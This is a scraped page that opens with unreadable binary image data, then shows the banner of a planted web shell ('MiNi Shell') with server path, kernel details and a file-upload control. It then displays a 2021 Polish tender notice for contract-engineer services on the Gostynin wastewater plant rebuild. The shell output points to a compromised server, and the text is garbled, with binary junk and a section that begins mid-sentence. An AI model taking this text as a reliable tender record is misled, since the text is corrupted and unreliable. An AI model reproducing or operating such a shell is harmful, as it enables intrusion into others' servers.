JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210616/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210616/0008477401-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00084774 z dnia 2021-06-16</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Pełnienie funkcji Inżyniera Kontraktu dla zadania pn.: Przebudowa i rozbudowa oczyszczalni ścieków w Gostyninie" </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miejskie Przedsiębiorstwo Komunalne w Gostyninie Spółka z o. o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 610364810</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Polna 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gostynin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">09-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL923 - Płocki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">242353011</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">242353011</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@mpkgostynin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mpkgostynin.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający sektorowy - art. 5 ust. 1 pkt 2 - gospodarka wodna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Pełnienie funkcji Inżyniera Kontraktu dla zadania pn.: Przebudowa i rozbudowa oczyszczalni ścieków w Gostyninie" </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a120d261-cce2-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00084774</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielnie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się za pośrednictwem miniPortalu https://miniportal.uzp.gov.pl ePUAPu https://epuap.gov.pl/wps/portal oraz poczty elektronicznej. <br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do komunikacji”. <br/>Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, e-mail: przetargi@mpkgostynin.pl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">3.	Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z miniPortalu dostępnym pod adresem https://miniportal.uzp.gov.pl/WarunkiUslugi oraz Regulaminie ePUAP.<br/>Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z miniPortalu, określone w Regulaminie miniPortalu oraz zobowiązuje się korzystając z miniPortalu przestrzegać postanowień tego Regulaminu. <br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” oraz do komunikacji wynosi 150MB. <br/>Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP. <br/>Zamawiający przekazuje link do postępowania oraz ID postępowania jako załącznik nr …… do niniejszej SWZ. Dane postępowania można wyszukać również na liście wszystkich postępowań w miniPortalu klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania. <br/>W postępowaniu o udzielenie zamówienia korespondencja (inna niż oferta Wykonawcy i załączniki do oferty) odbywa się elektronicznie za pośrednictwem dedykowanego formularza dostępnego na ePUAP oraz udostępnionego przez miniPortal (Formularz do komunikacji). Korespondencja przesłana za pomocą tego formularza nie może być szyfrowana. We wszelkiej korespondencji <br/> związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP).<br/>Dokumenty elektroniczne składane przez Wykonawcę za pośrednictwem „Formularza do komunikacji” jako załączniki, Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych za pomocą poczty elektronicznej na e-mail: przetargi@mpkgostynin.pl.<br/>Sposób sporządzenia dokumentów elektronicznych musi być zgodny z wymaganiami określonymi w:<br/>- rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postepowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020r. poz. 2452) oraz<br/>- rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od Wykonawcy (Dz. U. z 2020r. poz. 2415). <br/>Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej, wskazanych w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>1) Jest administratorem danych osobowych Wykonawcy oraz osób, których dane Wykonawca <br/> przekazał w niniejszym postępowaniu;<br/>2) Dane osobowe Wykonawcy przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu <br/> związanym z postępowaniem o udzielenie zamówienia publicznego na zadanie pn.: „Pełnienie <br/> funkcji Inżyniera Kontraktu na zadaniu inwestycyjnym pn.: Przebudowa i rozbudowa oczyszczalni <br/> ścieków w Gostyninie” prowadzonym w trybie podstawowym;<br/>3) Odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty, którym udostępniona <br/> zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy z dnia 11 <br/> września 2019r. – Prawo zamówień publicznych (Dz. U. z 2019r. poz. 2019), dalej „ustawa Pzp”;<br/>4) Dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres <br/> 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy <br/> przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>5) Obowiązek podania przez Wykonawcę danych osobowych bezpośrednio go dotyczących jest <br/> wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w <br/> postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych <br/> danych wynikają z ustawy Pzp;<br/>6) W odniesieniu do danych osobowych Wykonawcy decyzje nie będą podejmowane w sposób <br/> zautomatyzowany, stosownie do art. 22 RODO;<br/>7) Wykonawca posiada:<br/> - na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących Wykonawcy;<br/> - na podstawie art. 16 RODO prawo do stosowania danych osobowych, o ile ich zmiana nie <br/> skutkuje zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą <br/> postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie narusza integralności <br/> protokołu oraz jego załączników;<br/> - na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych <br/> osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/> - prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy Wykonawca <br/> uzna, że przetwarzanie jego danych osobowych narusza przepisy RODO; <br/>8) Wykonawcy nie przysługuje:<br/> - w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/> - prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/> - na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż <br/> podstawą prawną przetwarzania danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO;</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">MPK.271.12.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest pełnienie funkcji Inżyniera Kontraktu dla zadania pn. „Przebudowa i rozbudowa oczyszczalni ścieków w Gostyninie”, realizowanego w ramach - programu priorytetowego nr 1.1.1 „Gospodarka wodno-ściekowa w aglomeracjach, Część I - Gospodarka ściekowa w ramach Krajowego Programu Oczyszczania Ścieków Komunalnych” z Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej w Warszawie.<br/> Celem umowy z Inżynierem Kontraktu jest zapewnienie świadczenia na rzecz Zamawiającego <br/> usług związanych z Umową z Wykonawcą Zadania w czasie trwania Umowy, zgodnie <br/> z zakresem i terminami podanymi w Umowie oraz niniejszym opracowaniem, zawierającym <br/> Szczegółowy Zakres Usług Inżyniera. <br/> Usługi Inżyniera powinny zapewnić prawidłowe wykonawstwo wszystkich robót objętych <br/> Umową z Wykonawcą Zadania oraz uzyskanie zaplanowanych efektów użytkowych i <br/> finansowych przy zachowaniu maksymalnej ochrony środowiska. W trakcie budowy Inżynier <br/> Kontraktu powinien zagwarantować efektywną kontrolę wykonania robót zgodnie <br/> z przedmiotem zamówienia oraz harmonogramami realizacji, jak również zapewnić dyscyplinę <br/> wydatkowania środków finansowych oraz właściwą jakość robót. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71631300-3 - Usługi technicznego nadzoru budowlanego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71200000-0 - Usługi architektoniczne i podobne</p> <p class="mb-0">71300000-1 - Usługi inżynieryjne</p> <p class="mb-0">71310000-4 - Doradcze usługi inżynieryjne i budowlane</p> <p class="mb-0">71520000-9 - Usługi nadzoru budowlanego</p> <p class="mb-0">71530000-2 - Doradcze usługi budowlane</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający udzieli zamówienia Wykonawcy, którego oferta uzyska najwyższą liczbę punktów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> pełnieniu funkcji inspektora branży elektrycznej i AKPiA w tym przynajmniej dla jednej z nadzorowanych inwestycji polegającej na zaprojektowaniu i wykonaniu robót budowlanych dla modernizacji, przebudowy lub rozbudowy istniejącej oczyszczalni ścieków, będącej w ciągłej eksploatacji, przystosowanej do usuwania związków biogennych o wartości robót co najmniej 20 000 000 PLN netto,<br/>•	Posługiwać się językiem polskim lub dysponować tłumaczem języka polskiego.<br/>8.	EKSPERT NR 8 – Inspektor Nadzoru branży drogowej – posiadający następujące doświadczenie i kwalifikacje:<br/>•	Uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej,<br/>•	Co najmniej 5 letnie doświadczenie zawodowe, po uzyskaniu uprawnień w pełnieniu funkcji Inspektora nadzoru robót drogowych,<br/>•	Posługiwać się językiem polskim lub dysponować tłumaczem języka polskiego.<br/>9.	EKSPERT NR 9 – Specjalista ds. rozliczeń i księgowości – posiadający następujące doświadczenie i kwalifikacje:<br/>•	Wykształcenie wyższe inżynierskie lub ekonomiczne,<br/>•	Co najmniej 5 letnie doświadczenie zawodowe w kontrolowaniu obmiarów i analiz kosztów budowy przy realizacji inwestycji infrastrukturalnych, w tym przy realizacji co najmniej dwóch inwestycji z zakresu gospodarki wodno- ściekowej przy czym przynajmniej jedna z nich dotyczyła inwestycji polegającej na budowie, przebudowie lub modernizacji obiektów w zakresie gospodarki wodno- ściekowej o wartości robót minimum 20 000 000 PLN netto,<br/>•	Posługiwać się językiem polskim lub dysponować tłumaczem języka polskiego.<br/>10.	EKSPERT NR 10 – Specjalista ds. zamówień publicznych – posiadający następujące doświadczenie i kwalifikacje:<br/>•	Wykształcenie wyższe magisterskie,<br/>•	Co najmniej 5 letnie doświadczenie zawodowe na stanowisku Specjalisty ds. zamówień publicznych lub pokrewnym, związanym z przygotowywaniem i dokumentowaniem postepowań przetargowych w tym przynajmniej jednego wymagającego publikacji w dzienniku urzędowym Unii Europejskiej (TED) tj. przekraczającego kwoety określone w rozporządzeniu, dla którego publikacja w dzienniku urzędowym UE jest wymagana. Przez przygotowanie i dokumentowanie postępowań Zamawiający rozumie co najmniej: przygotowanie SWZ w tym IDW, OPZ i projektu umowy, przygotowanie i publikacje ogłoszenia o zamówieniu, udział w pracach komisji przetargowej w charakterze członka komisji, formułowanie odpowiedzi i publikacja odpowiedzi na pytania wykonawców, sporządzenie dokumentów takich jak: informacja z otwarcia ofert, zawiadomienie o wyborze najkorzystniejszej oferty i publikacja wyników postepowania,<br/>•	Doświadczenie w sporządzeniu co najmniej jednej kompletnej dokumentacji przetargowej na roboty budowlane dla inwestycji z zakresu gospodarki wodno-ściekowej, polegającej na budowie lub przebudowie oczyszczalni ścieków. Przez kompletną dokumentacje przetargową należy rozumieć przynajmniej sporządzenie Instrukcji dla Wykonawców, projektu umowy, opisu przedmiotu zamówienia, przygotowania ogłoszenia o zamówieniu,<br/>•	Doświadczenie w sporządzeniu co najmniej jednej dokumentacji przetargowej, realizo-wanej pod wodzą nowej ustawy Prawo zamówień publicznych, obowiązującej w polskim systemie prawnym od stycznia 2021r. Przez sporządzenie Zamawiający rozumie opraco-wanie SWZ oraz ogłoszenia publikacja ogłoszenia, sporządzenie protokołu z otwarcia ofert i zawiadomienia o wyborze najkorzystniejszej oferty.<br/>•	Posługiwać się językiem polskim lub dysponować tłumaczem języka polskiego.<br/>11.	Kierownik biura Inżyniera Kontraktu (Asystent Inżyniera Rezydenta) - Zamawiający nie sta-wia szczególnych wymagań ponad biegłą znajomość typowych programów biurowych (programy pocztowe, edytory tekstów, programy graficzne do obsługi podstawowych formatów graficznych i arkuszy kalkulacyjnych), podstawowego sprzętu komputerowego i biurowego (drukarki, skane-ry, kserokopiarki). Zamawiający wymaga aby osoba pracująca na stanowisku Kierownika biura Inżyniera została zatrudniona na podstawie umowy o pracę, zgodnie z przepisami przepisów prawa pracy i wykonywała swoje obowiązki służbowe w wymiarze pełnego etatu w siedzibie o której mowa w rozdziale II OPZ (8 godzin dziennie). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	W niniejszym postępowaniu Zamawiający żąda wniesienia wadium.<br/>Wykonawca zobowiązany jest przed upływem terminu składania ofert, tj. nie później niż do dnia 30.06.2021r. do godz. 10:00 do wniesienia wadium w wysokości 5 000 PLN (słownie: pięć tysięcy złotych). <br/>2.	Wadium może być wniesione w jednej lub kilku następujących formach: <br/> a) pieniądzu,<br/> b) gwarancjach bankowych,<br/> c) gwarancjach ubezpieczeniowych,<br/> d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy <br/> z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. <br/>3.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek bankowy <br/> Zamawiającego: 53-1240-3187-1111-0000-3141-0247 z adnotacją: „Wadium – Znak <br/> Sprawy: MPK.271.12.2021.<br/>4.	Za skuteczne wniesienie wadium w pieniądzu, Zamawiający uzna wadium, które zostanie <br/> zaksięgowane na rachunku bankowym Zamawiającego przed upływem terminu składania ofert. <br/>5.	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia Wykonawca przekazuje <br/> Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej – przed upływem <br/> terminu składania ofert. <br/>6.	W przypadku wnoszenia wadium w formie gwarancji bankowej lub ubezpieczeniowej, lub <br/> poręczenia, gwarancja lub poręczenie musi być nieodwołalne, bezwarunkowe i płatne na <br/> pierwsze pisemne żądanie Zamawiającego, sporządzone zgodnie z obowiązującymi przepisami i <br/> powinna zawierać następujące elementy: <br/> a) nazwę: dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego), <br/> gwaranta lub poręczyciela oraz wskazanie ich siedzib,<br/> b) kwotę wadium,<br/> c) termin ważności gwarancji/poręczenia w formule: „od dnia ……………- do dnia ………..”,<br/> d) zobowiązanie gwaranta/poręczyciela do zapłacenia kwoty wskazanej w gwarancji/poręczeniu <br/> na pierwsze żądanie Zamawiającego w sytuacjach zatrzymania wadium określonych w <br/> przepisach ustawy. <br/>7.	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia <br/> upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt <br/> 2 i 3 oraz ust. 2 ustawy. <br/>8.	Zasady dokonywania zatrzymania i zwrotu wadium 